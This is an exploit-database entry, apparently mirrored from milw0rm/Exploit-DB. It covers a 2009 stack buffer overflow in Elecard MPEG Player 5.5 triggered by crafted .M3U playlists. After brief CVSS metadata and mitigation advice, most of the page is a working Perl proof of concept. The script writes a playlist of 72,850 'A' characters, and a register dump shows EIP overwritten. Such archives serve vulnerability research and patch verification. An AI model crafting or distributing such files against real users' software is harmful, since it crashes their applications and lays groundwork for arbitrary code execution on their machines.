header-logo
Suggest Exploit
vendor:
MPEG Player
by:
milw0rm.com
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MPEG Player
Affected Version From: 5.5 build 15884.081218
Affected Version To: 5.5 build 15884.081218
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Elecard MPEG Player Buffer Overflow POC

A buffer overflow vulnerability exists in Elecard MPEG Player 5.5 build 15884.081218. The vulnerability is caused due to a boundary error when handling .M3U files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .M3U file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Elecard MPEG Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w

########################################################################
#Program  : Elecard MPEG Player                                       
#Version  : 5.5 build 15884.081218                                    
#website  : http://www.elecard.com/download/index.php                   
#Download : http://www.elecard.com/ftp/pub/mpeg/player/EMpgPlayer.zip 
#Type     :  * (.M3U) Buffer Overflow POC                             
########################################################################

#EAX 00000000
#ECX 41414141
#EDX 7C9037D8 ntdll.7C9037D8
#EBX 00000000
#ESP 0012BE40
#EBP 0012BE60
#ESI 00000000
#EDI 00000000
#EIP 41414141
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0
#EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
#MM0 0020 0202 0000 001B
#MM1 015A F2BC 8986 2BC0
#MM2 011C 0000 4020 027F
#MM3 0000 0000 804D A735
#MM4 BADB 0D00 BF83 15E6
#MM5 8A1B EAB8 0000 0005
#MM6 0000 0000 0000 0000
#MM7 D1B7 1758 E219 6000




my $file="boom.m3u";


open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 72850;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-01]

Navigation

Suggest Exploit

Services By CQR